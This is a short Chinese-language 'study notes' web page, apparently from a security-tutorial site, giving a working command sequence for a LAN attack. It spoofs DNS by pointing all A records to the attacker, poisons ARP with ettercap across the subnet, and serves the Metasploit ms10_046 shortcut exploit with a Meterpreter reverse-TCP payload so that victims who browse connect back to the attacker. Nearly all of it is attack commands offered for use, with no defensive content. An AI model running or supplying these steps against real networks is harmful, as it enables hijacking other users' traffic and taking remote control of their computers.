百度
360搜索
搜狗搜索

学习笔记 | Metasploit内网劫持详细介绍

内网渗透劫持DNS拿到cmdshell

 


ifconfig   //获取IP及网卡信息

leafpad /etc/ettercap/etter.dns   //打开文件 插入* A 记录 预设IP
service apache2 start   //启动本机apache服务 此次不用启动,使用ms10_046会自动启动
//* A ip 劫持所有A记录
//*.com A ip 劫持

msfconsole     //启动msf
search ms10_046   //搜索ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader   //设置模块
set payload windows/meterpreter/reverse_tcp
set l ifconfig的ip(本机ip或预设IP)   //监听
set serv ifconfig的ip(本机ip或预设IP)
exploit    //执行

ettercap -T -q -i eth0 -P dns_spoof -M arp /// ///    //劫持 -i 网卡 -P  ///分别代表 任意IP 任意地址
此时同意网段内用户访问网站时会 劫持 并与本机建立会话
目标机器上线后 jobs 
sessions -l
session -i 1

,

网站数据信息

"学习笔记 | Metasploit内网劫持"浏览人数已经达到47次,如你需要查询该站的相关权重信息,可以点击进入"Chinaz数据" 查询。更多网站价值评估因素如:学习笔记 | Metasploit内网劫持的访问速度、搜索引擎收录以及索引量、用户体验等。 要评估一个站的价值,最主要还是需要根据您自身的需求,如网站IP、PV、跳出率等!